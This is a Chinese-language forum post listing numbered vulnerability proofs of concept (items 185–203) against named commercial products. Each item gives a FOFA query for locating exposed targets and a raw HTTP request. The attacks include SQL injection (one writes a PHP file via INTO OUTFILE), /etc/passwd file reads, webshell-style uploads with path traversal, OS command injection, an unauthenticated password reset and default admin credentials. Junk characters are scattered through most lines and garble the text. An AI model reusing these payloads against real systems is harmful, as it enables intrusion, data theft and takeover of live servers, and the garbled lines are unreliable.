, H6 n7 V2 ~4 i
7 R; t$ d" x6 |9 ?0 O4 k$ Zinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
3 U9 M% _3 W9 [- q4 X7 v* T8 ~6 `8 N5 Q! s" N" R
$ U+ g+ _1 s" t# Z
185. 瑞友天翼应用虚拟化系统SQL注入
1 ^) X' S8 J8 A* h, o, ^version < 7.0.5.1' @- A. }7 u1 S
FOFA:app="REALOR-天翼应用虚拟化系统"
`# N1 q* B/ n( tGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1* H9 e3 s- l, ]4 V3 r
Host: host
/ R+ r! ?& `" B( |- x
& B; J2 f: v7 `9 F% A
, K* d/ w n- g% p& u3 N& S! D( t4 U8 z186. F-logic DataCube3 SQL注入6 P0 ^: G t9 }5 b
CVE-2024-31750
9 s9 v- r- b# o9 _F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统8 D, q @+ T+ I; h8 F" ?
FOFA:title=="DataCube3"0 F0 {& Y) [+ K3 r, C
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1" E; s2 z( e- @3 r- I
Host: your-ip. i" _2 F4 H$ @! L0 N, J0 v$ \2 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.07 M& X8 e8 E6 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
% r9 L9 s5 ^! h, wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ U K" ^8 n" _Accept-Encoding: gzip, deflate
. d1 a$ F$ @9 d. ` c$ rConnection: close
' k- Q7 {" m3 KContent-Type: application/x-www-form-urlencoded
) L* U5 L5 T( ^6 h0 |4 {3 f$ }$ ~8 l
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
+ c3 P! [, I- D' k& ?+ J6 C2 I, |' k' k" I- P5 U1 Y3 \
9 u9 q. }: Z9 T: F5 O187. Mura CMS processAsyncObject SQL注入
. \2 @ [9 T) S" `% Q q fCVE-2024-32640+ S. k/ d$ {0 l9 p5 X
FOFA:"Mura CMS"- }4 T. `6 u4 u* G; r n
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ j- m8 X( z4 N
Host: your-ip f, q/ c" q1 I: U! h: ]" F
Content-Type: application/x-www-form-urlencoded
& K J4 s5 T. i. o) B: k" u% H' }
' k9 x- y, I: \( }5 Q: B1 b
8 r4 |' `8 A6 ?object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
2 g0 M4 t6 N' \' p9 O Z; d8 X' [/ |7 K) S. ]* M% P2 B8 e# D. s5 B
/ ^; {8 u6 B0 ^% {: j4 L8 F! b
188. 叁体-佳会视频会议 attachment 任意文件读取* k/ x! C) T* k/ x
version <= 3.9.79 T# N' W/ Q0 X2 b+ X8 y, S
FOFA:body="/system/get_rtc_user_defined_info?site_id"; {5 ^: y& c f. y" K
GET /attachment?file=/etc/passwd HTTP/1.1
9 o' z. d$ U: F. u# W1 t8 x* B' vHost: your-ip
" n, v7 }7 O9 B. J2 q- o6 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 c9 u# L: T+ f$ d8 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 `; W" ]6 o P* b% ?4 `' RAccept-Encoding: gzip, deflate) Y" }2 E% A6 T# B; z0 r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.89 n1 L$ S) L) Z) I! r& L
Connection: close
" E( b1 d' m7 t8 K6 |' R8 N
. ^! c |/ a& T* b b# H; D' X$ p4 \3 j5 ~7 O% r0 D# R
189. 蓝网科技临床浏览系统 deleteStudy SQL注入- N- M: m" D: p
FOFA:app="LANWON-临床浏览系统"
$ |+ ~+ ~8 T+ |+ PGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
8 w) r) ]1 D, M3 f9 G; rHost: your-ip/ F5 q) M0 ~# E2 i$ W+ H6 T
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* \. }0 R X) W5 |. W7 U) R" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; r! S- p; V; iAccept-Encoding: gzip, deflate
) P' m/ u+ v ?# U1 pAccept-Language: zh-CN,zh;q=0.95 n' T6 j& I; J
Connection: close3 L0 _' a0 Y; \& s# i
- }. y) s2 W+ x% V, E2 E
; S5 N3 x3 _9 \6 H! k( @8 N p- S
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 Y+ f9 V7 }6 xFOFA:title=="短视频矩阵营销系统"( Q3 C7 e; p; Y' [; j
POST /index.php/admin/Userinfo/poihuoqu HTTP/2' J( {+ V( L. p7 V: n
Host: your-ip
) j# ]# I% D6 p5 b. ?) y/ W& fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.361 [/ P& W$ d* \* J! `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% P- Q0 F5 h3 a4 K0 ~' U
Content-Type: application/x-www-form-urlencoded
' k! T$ m0 H. B7 ^ I6 y9 A) xAccept-Encoding: gzip, deflate
1 r" ?2 m, ]. ]" v2 V( o! xAccept-Language: zh-CN,zh;q=0.9
( E! V0 Y; k/ P/ t
& D, w; |4 U+ o6 p. f! ~* s1 kpoi=file:///etc/passwd
6 {4 U6 ? e7 w5 x5 D+ }
% w) p. ] H5 L$ }6 E
+ D: k$ { n6 d% U$ ]191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 j" @( C9 W) _/ R
FOFA:body="/CDGServer3/index.jsp"
+ G3 k* s1 j$ G. v$ ZPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
8 S3 s5 T3 ^6 T( y. z- U3 XHost: your-ip
' I! }0 Q& \% J! WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 y& e; I! W! `$ o( }( Y
Content-Type: application/x-www-form-urlencoded0 r! X0 _7 C8 |
% ]- X- B: y" @2 ]# P
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=0 c5 }; d$ o8 o, x! w% P9 P5 a6 M
0 d# V& H4 F9 B( a# ^& o" ]# L. B$ l
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 `+ }# h5 U- n& D
FOFA:title="用户登录_富通天下外贸ERP"
$ O, p3 J" u" z! I8 M- n& F5 K3 yPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1; V& O$ @) z8 E! l9 T2 _
Host: your-ip
' s- }! @: U2 R( ` ^+ o% W/ IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* v; @6 i" }: ZContent-Type: application/x-www-form-urlencoded6 q1 _0 F( y. b) n% h2 ?- q$ \
3 s; Q, m: e ?
( |& J3 l4 A8 o) Q* {* l<% @ webhandler language="C#" class="AverageHandler" %>
; h) o9 E8 a( V7 _using System;/ M* U& i/ ~6 z' f
using System.Web;
: a" F% M2 A, ?8 Fpublic class AverageHandler : IHttpHandler
. L! F$ Z! t. w/ |$ m0 f/ x{
7 ]. ^- k& s2 Z- _+ R, J6 ^$ ppublic bool IsReusable
& n0 S3 @8 T' ]" q. O u. T; t{ get { return true; } }
- m* c( L( i" F# E& R! J; Y; O- }. rpublic void ProcessRequest(HttpContext ctx)% Z4 D& Z8 ^3 e1 ~9 h! X& ], T
{1 k2 `8 A% P7 a9 l2 a
ctx.Response.Write("test");
; f6 k% k/ o( ?* m8 D1 J4 Y! _}
; y- R' G5 A |# m; z e}( U8 m4 d7 w9 g+ Y$ f/ x+ f1 a, Q. c
$ l5 S8 d6 H, s( L5 q
, W" ^0 T" }3 P* m: J193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
9 q, {: @, b( I8 \ D9 I3 SFOFA:body="山石云鉴主机安全管理系统"
$ K* z R# o6 j" E9 l4 ]6 uGET /master/ajaxActions/getTokenAction.php HTTP/1.10 g( `* V c6 O; V5 _* [
Host:0 n2 ~; G) [4 g* A4 k- v
Cookie: PHPSESSID=2333333333333;
4 h: {, i0 m" i( @Content-Type: application/x-www-form-urlencoded+ x9 S# ?9 r; e; y& M
User-Agent: Mozilla/5.06 c1 q# {# D4 ?* c' u$ g: ]6 ^
/ r$ w/ `& Z. K' Z# v
7 Y# d" F: R6 }4 ]6 c, f! x
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1/ Z; D- s a* _! d- V$ N
Host:
y. x+ [) @: O! O/ T" D+ w2 m2 w; XUser-Agent: Mozilla/5.0
1 u% S4 H2 O3 R. o: _3 N9 g& XAccept-Encoding: gzip, deflate
8 M6 W" b0 Z% lAccept: */*+ d! I0 e9 m# G; ~# H
Connection: close
( m. K1 G1 }6 e# CCookie: PHPSESSID=2333333333333;% ~$ p/ u5 z& h
Content-Type: application/x-www-form-urlencoded
* c& w# k3 u$ g% n2 VContent-Length: 84
( v9 Q6 g7 y( Y7 ^8 T4 Y1 _# d1 V: t4 Q
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')7 f3 y& p* E6 W; \+ K4 t/ c* h) }
' U Q" {4 P+ {6 O" M9 ~
* U- x2 V4 q7 w' l* J: lGET /master/img/config HTTP/1.1
) w6 I& O3 _! D0 l$ \Host:
8 H1 k# P6 K/ ZUser-Agent: Mozilla/5.0
" a8 o$ A: q8 f9 C
% U5 K8 S o$ U( P. `1 }! \" d
$ D7 y8 V b4 n8 e. O! x% t194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传/ [2 a! c/ ?( w4 M
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在7 s$ A0 O6 ?7 A. Z) ?4 l4 b$ r
4 B' t' _5 z, w6 M, q
POST /servlet/uploadAttachmentServlet HTTP/1.1
5 E, ?1 {* g9 R+ cHost: host
, R( [. K1 ^$ j d& a) @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0 t$ ]8 J7 `$ N- UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- U3 i6 y+ _7 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 I- x' R- ?+ P- P) a5 v9 C+ ?Accept-Encoding: gzip, deflate
- b1 g8 L/ N3 t- {0 b4 QConnection: close- Y" a" \: V& {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk8 _9 E( x6 c: t9 U% l0 a" v
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
* E2 p$ v8 n( ~, ~7 H
. a J: s# O. a& [/ OContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"8 Q8 c; T7 x6 q( J" H
Content-Type: text/plain
9 P; }9 X7 k0 \9 J<% out.println("hello");%>
# y. u# k1 F7 y- ? y* H( e------WebKitFormBoundaryKNt0t4vBe8cX9rZk b. l% ?# ^2 s& b0 }
Content-Disposition: form-data; name="json"
) f. j. @% t: s: q5 P: } {"iq":{"query":{"UpdateType":"mail"}}}
! y6 d4 j6 A# z" v------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
4 s V, ~! S1 ?3 u1 h( Z( w7 u: V2 w! L
8 r) V0 G% l1 X1 [
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行& m$ w. ?% e1 z# Y5 {' Q7 [. ^' k6 V
FOFA:title=="飞鱼星企业级智能上网行为管理系统
8 R/ n* ?% X' E% m" X q8 SPOST /send_order.cgi?parameter=operation HTTP/1.1% a8 L0 _8 f! X2 |! y- x7 o
Host: 127.0.0.1
" j" }4 e+ z! P: O9 E, bPragma: no-cache+ |/ p9 h2 H) j* X% D
Cache-Control: no-cache
0 Q' j' M! } c7 j) z+ N4 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- t/ E& Q8 s0 w. u0 Y- {
Accept: */*/ J* ^, Z4 D4 j5 x. D7 t- {
Accept-Encoding: gzip, deflate
5 N# \ h4 Q& _9 ]; tAccept-Language: zh-CN,zh;q=0.9
5 m1 Q3 p: ]1 ~- C& g% vConnection: close* M2 ~) K' k. t% f
Content-Type: application/x-www-form-urlencoded
5 w% |$ W; k9 K9 ^ w& {- UContent-Length: 68; S/ S0 T# [# h2 c* C: D' x8 X
! o) a* v) ~8 o; t0 O
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
" X1 s& n7 V( A, n; n$ N8 o a2 z5 {& _: _
& \! u: w4 \( g196. 河南省风速科技统一认证平台密码重置. ~" d5 `( `: g. B+ V# S8 E
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"! L" g" ]/ |6 } C9 ]) a
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
[' }8 r. }# hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ ~: F z6 h5 ^/ L( a& ^5 n$ @
Content-Type: application/json;charset=UTF-8% I3 P: N- R/ Q( N
X-Requested-With: XMLHttpRequest
2 I# o. n, k E2 ?Host:/ Z! j: |. S% B; d( d
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
% N8 S0 a$ a9 f1 MContent-Length: 45- v* \$ z4 y$ ]5 r8 _3 R" T( h U
Connection: close8 G8 j5 }% O9 E: A& s& Q7 ?
5 H! \( z% S9 T- N2 P+ I4 K2 s{"xgh":"test","newPass":"test666","email":""}% c/ X; j" e0 z
! W0 j+ o4 m r; Y0 p, [4 L0 }+ W1 S8 \7 }# F% D+ e
2 z2 ~& u. S9 O {4 L h8 h8 `1 F197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' H* _% c. q, ?. J4 SFOFA:app="浙大恩特客户资源管理系统"
6 Q, C% [1 y p' rGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1 Q6 G' [+ T1 ]. L& {1 `- t
Host:9 W0 S+ ], E8 U. B8 D4 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36, ~% Q" ?8 I( i
Accept-Encoding: gzip, deflate0 p3 Z: q) V7 ~' B* W O% I& k; j
Connection: close
4 B6 ^* k; _; r: D6 t6 F
2 ^4 ]4 Q, H' i2 W `0 I t: Z c9 U* N X% ~
+ J4 g3 y# o0 o& o' H
198. 阿里云盘 WebDAV 命令注入: @) J5 b+ G% {# i
CVE-2024-29640
& H( q& r/ }7 [: ]GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
4 }* O0 a# k5 Z) J) xCookie: sysauth=41273cb2cffef0bb5d0653592624cf64 ]* N- L) K- F M/ Y0 Z+ H
Accept: */*4 t4 N6 z- X) t# p
Accept-Encoding: gzip, deflate& s9 q! F/ p5 [& H
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.63 @. u: ~- S& n
Connection: close
8 t) Z1 @7 N8 I! K5 x3 a/ @3 q: q2 k; N( p0 G7 s( P
; M N4 m+ S% W* A199. cockpit系统assetsmanager_upload接口 文件上传8 @* f+ p$ |$ R0 d
# n( B' e" y0 m1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
- v; R! M) I9 C" i& v+ QGET /auth/login?to=/ HTTP/1.1
" e- s" g/ Y* C( }2 J8 n* L4 _! A1 J+ _5 x9 v
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
6 c1 ~& A4 \; ?+ r7 l* ^7 K; ]& G/ O2 X: Y
2.使用刚才上一步获取到的jwt获取cookie:2 M }$ _# K. ?- K; F" g9 R" h: f/ p* G
! U1 f9 |/ G: o PPOST /auth/check HTTP/1.1
8 X- W/ x4 k/ \% r! P) I+ q) aContent-Type: application/json
* x0 C) {, ~9 {2 `5 J5 r7 q& g
: b; o( H6 w; B: v0 R9 y{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}) D6 y6 H, B D# I1 Z$ X+ t' _' I7 {
- G- @4 P% I# _
响应:200,返回值:8 p4 c9 J2 T% R2 o+ h- J
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
4 Q0 M9 l9 w2 b. r4 D3 b# I" R5 x7 lFofa:title="Authenticate Please!"
6 D2 g2 r& r# @" e& ZPOST /assetsmanager/upload HTTP/1.10 u3 S1 L7 @3 U% U2 L3 p9 ~* |
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
# Z& J% E. H8 }; @5 _1 z) ECookie: mysession=95524f01e238bf51bb60d77ede3bea92
o' c* g/ e3 _& Y1 ^3 ] K( O& S" ]* U* h" Y
-----------------------------36D28FBc36bd6feE7Fb3
: }9 y2 F% t% z4 @Content-Disposition: form-data; name="files[]"; filename="tttt.php"5 z7 W6 \ R+ H9 u# d
Content-Type: text/php0 r' B J4 j6 D1 z
* X0 g* m! D" ~, i4 ^
<?php echo "tttt";unlink(__FILE__);?>0 v( E6 o1 C& R8 Q/ r" O
-----------------------------36D28FBc36bd6feE7Fb3
8 {1 L( ]* v. x: P% D Z' RContent-Disposition: form-data; name="folder"
% L* w' {) A0 X/ f
9 w3 |( l" @" ?: Q* @2 d# i1 O9 b-----------------------------36D28FBc36bd6feE7Fb3--4 J7 }5 J$ @- `& x1 W7 ~0 M: {
6 n! t6 ?1 l ^
' G6 ]& r4 `9 J9 z. ^# r k2 [/storage/uploads/tttt.php
; M: V) i8 \: I+ D4 S; P" {/ A1 d( b" k
200. SeaCMS海洋影视管理系统dmku SQL注入5 b6 I! ], x8 W* k
FOFA:app="海洋CMS" @$ f9 n5 N# ?2 L2 r4 w
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1! u, \5 H1 i1 b6 m
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s0 Y) k% U' D Z; x9 p6 L+ w& G
Upgrade-Insecure-Requests: 1
" ?8 P1 G' T" iCache-Control: max-age=0
$ {0 K+ i4 p3 F( b8 B" U; a) uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 a+ m7 y; \1 U: w# {Accept-Encoding: gzip, deflate$ ~( S" ~/ r- H
Accept-Language: zh-CN,zh;q=0.9
1 c) K* m6 _8 O6 A2 n9 [
5 ~( z: K! \: j1 e' q/ T9 d1 e3 p2 u0 X
201. 方正全媒体新闻采编系统 binary SQL注入
) ^- _6 k# \8 \6 b- \+ v' IFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
' d% L0 x+ x% ]- y0 m$ mPOST /newsedit/newsplan/task/binary.do HTTP/1.1
& G* O x1 u2 A' ~Content-Type: application/x-www-form-urlencoded
3 I- |) g8 i1 _' U! CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: f7 ?5 t8 s1 g' {4 kAccept-Encoding: gzip, deflate
; a7 J. e" o9 l$ [! f2 |Accept-Language: zh-CN,zh;q=0.9
' w, k% N" O, i% D X. @Connection: close
. J# A2 i8 l- z) Q$ K( `) b5 T' q: a3 R+ C* e( N- r6 p7 @" R
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
9 K) m. u4 v+ Y r5 E7 @$ x
4 |( ^8 l3 T; I1 Q; ^
) I% B3 A/ M8 z202. 微擎系统 AccountEdit任意文件上传7 o! ]% G, i$ e; E
FOFA:body="/Widgets/WidgetCollection/"6 t7 m; [3 O8 m/ K" H2 v
获取__VIEWSTATE和__EVENTVALIDATION值
, x6 l- _* _; Z. EGET /User/AccountEdit.aspx HTTP/1.1
4 {# A9 o, b$ aHost: 滑板人之家- Z# y5 g" h! n0 M; r) d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
7 D, j' I+ e' H3 Q0 H: ~Content-Length: 0
! G G" p5 j) D c7 e( i, d7 o Z F! I
' B f! j6 ]" c
替换__VIEWSTATE和__EVENTVALIDATION值
8 `) N G' d* I+ V, u' KPOST /User/AccountEdit.aspx HTTP/1.12 C o, R2 ^* `- }1 D- v
Accept-Encoding: gzip, deflate, br
. _+ o( n: Z. wContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
/ j8 F8 j* G- H; B. J9 w1 P& A6 ?$ q! J5 d( @& D5 f! y( R
-----------------------------786435874t38587593865736587346567358735687
3 K. o8 w: t0 s1 ]2 J' `- R7 oContent-Disposition: form-data; name="__VIEWSTATE"
* _6 L. R1 i3 U$ B& R) v2 K1 U/ V X! b+ A1 c1 m
__VIEWSTATE: J0 ?% t9 W7 O$ T1 e" \. A
-----------------------------786435874t38587593865736587346567358735687& e* K' S, m! k9 ^6 X( ]1 E! E
Content-Disposition: form-data; name="__EVENTVALIDATION"
4 x* {/ b3 I2 c2 x, U* {! _: k# R ~) I }0 Z: ^
__EVENTVALIDATION
# v" a7 G% G8 I& S) f& g4 C-----------------------------786435874t38587593865736587346567358735687
8 l. }4 x" X3 d% v% fContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
1 e) B# ~! {9 |5 n. M* B* s7 U6 AContent-Type: text/plain" V0 m6 f" N6 ~. a9 p
& P( b" B) v% ?. U6 t- QHello World!/ K) T1 u# }2 l+ ?
-----------------------------786435874t38587593865736587346567358735687
9 p: B# g- l4 C7 k6 ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"$ o" S0 C1 x' p) ?. X
6 Y: T8 L i6 _: f, ]1 T3 f) T
上传图片
O; L9 b, }0 E2 n! J-----------------------------786435874t38587593865736587346567358735687
$ b0 B% u9 u" ^2 iContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
8 Z9 }; U" F5 F o- B
5 {& ]5 t# t4 J$ D1 V/ Q7 V- `1 d. r( c8 i' d
-----------------------------786435874t38587593865736587346567358735687% d9 D& z; G8 j0 B1 q0 B; Y* _
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
% q% v0 `+ H* }% H# z4 o& {- Q4 Y6 c5 F5 r1 \& `
" h3 U3 e( x( @4 {3 D/ H
-----------------------------786435874t38587593865736587346567358735687--
3 K- |. K; O; d
! M* }' m; V0 K4 Z5 P7 ~0 l$ @0 M$ T! m9 }/ U% Y/ F
/_data/Uploads/1123.txt1 i) \7 g, n: ?* j# Y% C4 }
3 b' S: ]2 H) K |' g. G! v5 J8 I203. 红海云EHR PtFjk 文件上传
/ d7 B9 X/ P* E) R6 EFOFA:body="RedseaPlatform"
: g, n) L9 g6 o# L* Q# ]- jPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
! V4 b X1 K! u$ b# {Host: x.x.x.x
! e9 c2 I& R" h8 TAccept-Encoding: gzip
- l+ A3 ?% T7 }4 N, hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 M# a9 ^, r! v, eContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4/ H, ^8 n1 Q# M( O
Content-Length: 210 t: J) o) B; B: v% T5 F$ H6 R
+ l: x# }' c* I* D4 \+ _/ ]
------WebKitFormBoundaryt7WbDl1tXogoZys4' Z" G W Q1 J1 T* p( @+ X
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
! M4 J# d; Q0 K0 S% T% `+ v" W6 f; yContent-Type:image/jpeg, P: z4 M6 C- q' j; D
; K; S# C8 K/ E8 }7 L* o# K
<% out.print("hello,eHR");%>
9 u" \6 J* a, ] C3 v------WebKitFormBoundaryt7WbDl1tXogoZys4--) e3 c- _5 }0 _4 e( G$ M2 D; N
" m% O: l, b' c$ f6 \
5 a3 Q0 c2 ~: Y7 C( E9 g) [
8 p! e- L' `' ~( O2 G, H" [4 b! B7 Y W7 k9 n+ O3 L/ [- A; w
% \8 y) [. ^ C: ^# L( n$ _6 {; Q4 H5 D( a2 q
|
发表于 2024-6-5 14:31:29
收藏
支持
反对